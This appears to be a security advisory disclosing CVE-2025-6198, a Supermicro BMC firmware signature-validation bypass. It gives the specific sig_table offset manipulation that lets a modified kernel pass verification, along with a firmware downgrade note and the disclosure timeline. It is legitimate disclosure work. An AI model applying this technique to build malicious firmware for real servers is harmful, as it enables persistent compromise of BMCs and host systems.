Supermicro BMC firmware update validation bypass
BINARLY team has discovered a vulnerability in the Supermicro BMC firmware authentication design, allowing a potential attacker to update the system firmware with a specially crafted image.
Image preview
Potential Impact
An attacker could trick the BMC administrator to update the BMC system with a custom image containing malicious content. This would result in the complete compromise of the BMC system, also providing access to the main host OS. It would also allow the attacker to make the attack persistent during a BMC component reboot and perform lateral movement within the compromised infrastructure, infecting other endpoints.
Image preview
Vulnerability Information
- BINARLY internal vulnerability identifier: BRLY-2025-021
- Supermicro PSIRT assigned CVE identifier: CVE-2025-6198
- CVSS v3.1: 7.2 High AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Image preview
Affected Supermicro firmware
| Device | Version | SHA256 |
|---|---|---|
X13SEM-F | 01.03.47 | bc859f2c4858ae51165b25fb8dfae6d7862e8515a921e7f7bdb9b66443a44501 |
Image preview
Vulnerability description
auth_bmc_sig function parses the sig_table section of the uploaded BMC firmware, which contains information about signed regions of the image:
- offset:
0x0000000, size:0x0100000–bootloader - offset:
0x0100000, size:0x0001000–sig_table - offset:
0x0110000, size:0x0010000–pdb_seca - offset:
0x0130000, size:0x03e9e00–kernel - offset:
0x0630000, size:0x2000000–rootFS (1st part) - offset:
0x2630000, size:0x064a080–rootFS (2nd part)
The firmware validation process involves calculating the SHA512 digest of these regions and comparing it with the signed with RSA4096 value placed in the firmware image. As all the regions used for the digest calculation are defined in the uploaded image itself (in the sig_table), it is possible to modify it (along with some other parts of the firmware image — for example, the kernel) and place the original data to unused space in the firmware. This means that the data will still match the original signed digest value.
For example, it is possible to modify 0x200 bytes of the kernel region at offset 0x1c5600, and then update sig_table with the following entries:
- offset:
0x0000000, size:0x0100000–bootloader - offset:
0x0101000, size:0x0001000–sig_table(original) - offset:
0x0110000, size:0x0010000–pdb_seca - offset:
0x0130000, size:0x0095600–kernel(before custom content) - offset:
0x0102000, size:0x0000200–kernel(original data that was replaced with custom content) - offset:
0x01c5800, size:0x0354600–kernel(after custom content) - offset:
0x0630000, size:0x2000000–rootFS (1st part) - offset:
0x2630000, size:0x064a080–rootFS (2nd part)
We were able to validate this technique on a device, and it resulted in execution of customized Linux kernel during the boot, which effectively allowed us to bypass BMC RoT feature.
Note: it is also possible to downgrade the BMC firmware. For example, when using the latest firmware, firmware image with version 01.02.06 is accepted and flashed.
Note: the X13SEM-F firmware with version 01.04.15 (SHA256: b9039a551ea31fc2590567e8d1aa3ed55dcf74a3f7694921af9e4eb2b5997064), which was released after this issue was reported to the Supermicro PSIRT, is also vulnerable.
Image preview
Disclosure timeline
This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.
| Disclosure Activity | Date (YYYY-mm-dd) |
|---|---|
Supermicro PSIRT is notified | 2025-05-29 |
Supermicro PSIRT confirmed reported issue | 2025-06-21 |
Supermicro PSIRT assigned CVE number | 2025-06-21 |
Supermicro PSIRT public disclosure date | 2025-09-17 |
BINARLY public disclosure date | 2025-09-18 |
Image preview
Acknowledgements
Image preview
See if you are impacted now with our Firmware Vulnerability Scanner
Find Vulnerabilities, Generate SBOMs & CBOMs